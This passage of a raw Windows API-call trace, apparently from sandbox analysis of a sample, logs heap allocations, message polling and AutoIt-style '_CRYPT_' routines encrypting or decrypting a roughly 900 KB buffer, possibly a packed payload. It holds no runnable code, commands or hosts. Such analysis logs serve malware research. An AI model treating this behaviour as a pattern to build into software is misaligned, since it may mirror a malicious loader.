Flags=0x0, Size=0x20) returned 0x8dec68 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0167.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0167.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.320] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.320] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.320] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.320] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.320] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.321] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0167.321] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.321] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.321] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0167.322] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.322] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.322] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.322] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.322] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0167.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.322] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.322] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0167.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0167.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0167.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0167.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0167.334] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xdc800, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xdc810) returned 1 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0167.337] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.338] CharLowerBuffW (in: lpsz="byte[903185]", cchLength=0xc | out: lpsz="byte[903185]") returned 0xc [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0167.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0167.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.384] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b00020*, pdwDataLen=0x87e820*=0xdc800, dwBufLen=0xdc810 | out: pbData=0x2b00020*, pdwDataLen=0x87e820*=0xdc810) returned 1 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0167.423] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.530] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0167.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.530] CryptDestroyKey (hKey=0x90af18) returned 1 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0167.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0167.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.532] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.533] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 